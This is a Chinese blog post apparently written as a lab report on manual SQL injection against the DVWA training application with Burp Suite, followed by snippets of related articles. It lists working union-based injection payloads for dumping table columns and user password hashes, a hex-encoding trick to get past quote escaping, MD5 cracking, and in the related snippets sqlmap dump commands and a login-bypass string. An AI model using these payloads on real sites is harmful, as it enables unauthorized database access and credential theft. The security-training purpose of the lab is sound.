信息安全之使用Burpsuite进行SQL注入安全实验

已于 2025-05-08 09:16:02 修改
阅读量985 收藏 10
点赞数 22
文章标签: 安全 安全威胁分析
于 2025-05-07 20:20:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HENANwuyanzu66/article/details/147772893
版权

一、实验环境:

一台装有Windows10操作系统的计算机,用来进行安全脆弱性鉴定的DVWA。软件Burpsuite。

二、实验内容和步骤:

1.Low级别手工注入

(1)首先设置安全级别为low,点击SQLinjection进入SQL注入练习页面,在框里随便输入一个ID号,发现能返回用户信息。同时URL中出现了提交的参数信息,说明该页面的提交方式为GET。 

(2)在文本框中输入 2‘,发现页面报错,说明单引号被执行,存在 SQL 注入漏洞,并从报错信息中得知该站点的数据库为 MySQL,

(3)在文本框中输入 1 and 1=1 和 1 and 1=2,都能返回数据,说明可能注入漏洞不是数字型

(4)在文本框输入 1' and 1=1#,可以返回数据,输入 1' and 1=2#,没有数据返回,说明注入成功,确认漏洞为字符型。

(5)在文本框输入 1' order by 1 和 1' order by 2,有数据返回,输入 1' order by 3,页面报错,说明本页面只查询了 2 个字段

(6)在文本框输入 1' and 1=2 union select 1,2#,确认页面中 First name 处显示的是记录集中第一个字段,Surname 处显示的是记录集中第二个字段

(7)在文本框输入 1' and 1=2 union select database(),2#,原第一个字段处显示当前数据库名称为 dvwa

(8)在文本框输入 1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#,原第二个字段处显示 users 表中的所有字段名。其中发现 user 和 password 字段,极有可能是用户名和密码字段

(9)在文本框输入 1' and 1=2 union select user,password from users#,原第一个字段和第二个字段处分别显示表中的用户名和密码

(10)在 http://www.cmd5.com 破解 MD5 加密的密码,即可得到密码明文。这里我们以第三个密文为例,得到的密码为charley

2.Medium级别SQL手工注入

(1)安全级别设置为 Medium 后,再次进入 SQL 注入模块,发现没有了文本框,随便选择一个 ID 后,可以返回数据,且 URL 上没有显示任何参数,说明该页面为 POST 提交方式。由于页面中没有提供输入信息的接口,所以需要使用 Burpsuite社区版等工具来构造 POST 包

(2)运行 Burpsuite,并设置好浏览器代理

(3)再次到 SQL 注入页面随便选择一个 ID 值,点击提交,该数据包会被 Burpsuite 拦截并显示

(4)在 ID 值后加入 ' 单引号,并点击 Forward 按钮,浏览器报错,发现同样存在 SQL 注入漏洞

(5)再次随意选择 ID 值,在 Burpsuite 拦截的包中 id= 后加上 and 1=1,可以返回数据,加上 and 1=2,没有数据返回,确认 SQL 注入点为数字型

(6)再次拦截数据包,加入 and 1=2 union select 1,2,确认页面中 First name 处显示的是记录集中第一个字段,Surname 处显示的是记录集中第二个字段

(7)查询数据库名、表名方法与 Low 级别思路一致,只不过不需要单引号和 # 来闭合语法。

(8)拦截数据包,加入 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' 来查询字段名时,发现页面报错

(9)点击“intercept is on”先暂时关掉 Burpsuite 的代理功能,在SQL注入页面中点击 View Source,查看当前源码,发现对提交的 ID 值添加了 mysql_real_escape_string 函数,该函数会对单引号进行转义,从而导致 SQL 语句构造不成功

(10)对表名 users 进行 16 进制 HEX 编码,就可以无需使用单引号。users HEX 编码后为 0x7573657273。重新开启 Burpsuite 的代理功能后,在拦截的包中加入 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273,可以成功查询出字段名

(11)拦截数据包,加入 and 1=2 union select user,password from users,可得到密文,再使用md5解密可以成功查询出用户名和密码的内容这里以第一个密文为例,得到的明文为password。

BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6148
BurpSuit官方实验室靶场-SQL注入通关记录。
SQL注入-11】base64注入案例—以Sqli-labs-less22为例(借助BurpSuite工具)
m0_64378913的博客
05-06 3219
目录1 base64注入概述1.1 base64编码基础1.2 base64编码与URL编码1.3 base64注入2 base64注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 尝试使用union查询2.2.4 获取库名表名字段名字段内容 1 base64注入概述 1.1 base64编码基础 定义:Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 Base
Burp Suite抓包实战:SQL注入漏洞挖掘
水务人
03-29 2192
本文系统解析如何利用Burp Suite专业版开展SQL注入漏洞的定向挖掘,涵盖手动探测、自动化利用、WAF绕过等进阶技巧。通过电商、金融等行业的真实渗透案例,详解从流量拦截到漏洞利用的全链路方法论,实现单日最高挖掘23个高危注入点的实战成果。
SQL注入攻击复现实验
最新发布
m0_74579330的博客
04-08 1416
SQL 注入是通过在用户输入或其他外部输入的数据中注入恶意的 SQL 语句,利用应用程序对用户输入处理不当的漏洞,改变原本 SQL 语句的逻辑,从而获取数据库中的敏感信息、篡改数据或者执行其他非法操作。在在浏览器输入127.0.0.1/denglu.html,访问html网页,在用户名输入框和密码输入框中输入“'or'1'='1”,此时显示登录失败,防护成功。输入我们在数据库中写入的用户名和密码,不直接跳转php页面,反而下载php网页的代码。查看php代码中执行的SQL语句,分析异常情况。
网络安全实验sql注入实验(一)
qq_64314976的博客
06-23 963
通过实验学习到SQL注入的基本操作以及使用SQL注入得到数据库里面的用户名和密码等等,刚开始不知道如何从Web服务器向数据访问层发送SQL请求,后来通过同学交流才得以解决。本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明;本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明;本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明。实例二、节约是种美德,少用空格。
sql注入 BurpSuitesqlmap联动,sqlmap友好图形化界面解决办法 CO2(sqlmap插件) 使用
qq_62433118的博客
10-26 2381
sql注入BurpSuitesqlmap联动,sqlmap友好界面解决办法 CO2(sqlmap插件) 使用
使用sqlmap+burpsuite进行中级sql注入
06-01
本篇将详细介绍如何结合sqlmap和BurpSuite工具进行中级SQL注入的实战操作。 首先,我们需要了解sqlmap和BurpSuite的基本功能。sqlmap是一款自动化SQL注入工具,它能自动检测和利用SQL注入漏洞,获取数据库信息。...
BurpSuite 爆破 SQL 注入
MZa1213123的博客
03-03 2423
靶场 用 burpsuite 进行抓包 (最好是用专业版 可以设置多线程快速爆破) 右键该页面 Send to Intruder 首先将 Attack type 改为 Cluster bomb 接着 Clear 清除全部变量 然后 Add 变量到 username 和 password 的地方 设置 payload payload 1 选择 Runtime file 也就是自己选择的字典 我这个是 kali 自带的 SQL.txt payload 2 选择 Simple lis
DVWA系列(六)——使用Burpsuite进行SQL Injection(SQL注入
热门推荐
橘子女侠
05-06 1万+
1. SQL注入简介 (1)SQL注入漏洞原理 将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的; (2)SQL注入漏洞类型 字符型; 数字型; 搜索型; (3)SQL注入的过程 判断是否存在注入注入是字符型还是数字型; 猜解SQL查询语句中的字段数; 确定显示位置; 获取当前数据库;获取数据库中表; 获取表中的字段名; 下载数据; 2....
利用Burpsuite完成SQL注入中等级版本.docx
11-19
掌握利用工具如Burpsuite进行SQL注入的技术是网络安全专家必备的技能之一。 首先,安装Burpsuite使用该工具的前提条件。Burpsuite是一个集成化的网络应用安全测试工具,它可以拦截和修改网络应用程序的HTTP请求和...
漏洞原理SQL注入Burpsuite工具的使用_burp怎么检测sql注入漏洞-CSDN博客.pdf
02-24
Burp Suite是集成了多种渗透测试功能的工具集合,它支持Web应用的安全测试,包括SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等多种漏洞的检测和利用。 在Burp Suite中,Proxy模块作为基础模块,是用户与...
burpsuitesql联动工具注入漏洞
mammal7的博客
11-05 2609
工具注入的天花板!burpsuitesqlmap联动注入漏洞。用dvwa靶场来实验一下。
网络安全——SQL注入实验
网络工程
12-12 4826
1、掌握SQL注入的原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证。
SQL注入实验原理
2302_81105681的博客
04-11 1760
命令:sqlmap -u "目标url" --dump -C "username,password "-T "users" -D "security"命令:sqlmap -u "目标url" -- columns -T "users" -D "security"命令:sqlmap -u "目标url" --tables -D "security"获取当前数据库名命令:sqlmap -u "目标url" --current-db。id=1’ and ‘1’=’1 页面没有报错。
oracle sql查询时间_「Burpsuite练兵场」SQL注入及相关实验(二)
weixin_39715652的博客
12-04 211
Burpsuite练兵场系列文章更新啦,今天的内容是延续上期关于SQL注入及相关实验的讲解,对实验感兴趣的小伙伴千万别错过了呦!上期回顾「Burpsuite练兵场」SQL注入及相关实验(一)上节内容介绍了一些基础的SQL注入操作,这一节实验学习的内容为如何在探查到了SQL注入点后利用漏洞获取到数据库信息。通过SQL注入获取数据库信息获取数据库的关键信息,如数据库中的表和列需要访问保存描述各种数据库...
真实sql注入以及小xss--BurpSuite联动sqlmap篇
m0_68976043的博客
03-29 832
因此我尝试了注入,在order by 1和order by 2的时候是没有报错的,而3就有了证明一件事情,表格是两列,咱们暂且确定他是user列和password当然是我猜的。那就ok了,我们直接去sqlmap爆破即可,这里提示一个小点,BurpSuite联合sqlmap使用,将数据包导出来然后导入sqlmap目录下使用。首先我先去网站的robots.txt去看了看无意间发现很多资产。很明显我输入的已经到里面了,我们现在尝试更改命令为查询语句。而当我注入列的时候情况出现了。出现了报错,有报错必有注入点。
sql手工注入实战
mulincong的博客
05-30 2447
sql手工注入封神台靶场
实验六:暴力破解
weixin_46544151的博客
04-23 1877
一、实验目的及要求 通过该实验熟悉爆破的原理和Burp suite的使用 二、实验原理 1、DVWA(Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 其主要目标是成为一个帮助安全专业人员,以测试他们的技能和工具,在法律环境允许下,帮助Web开发人员更好地理解保护Web应用程序和援帮助教师/学生教/学在教室环境的Web测试应用程序安全的过程。 2、B
实验三:XSS和SQL注入
yghlqgt的博客
11-27 876
试验前需要掌握的知识 下面内容是试验前你需要了解并掌握的知识,详细的内容可以移步到这篇博客中去学习:试验前的知识储备 XSS部分 1、什么是XSS 2 、什么是XSS攻击 3、 什么是Cookie 4、XSS漏洞的分类 5、XSS的防御 SQL注入部分 1、什么是SQL注入攻击 2、为何会有SQL注入攻击 3. 何时使用SQL注入攻击 4、MySQL简介 5、实施SQL注入攻击 6、防范SQL注入方法汇总 实验部分 实验目的: 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值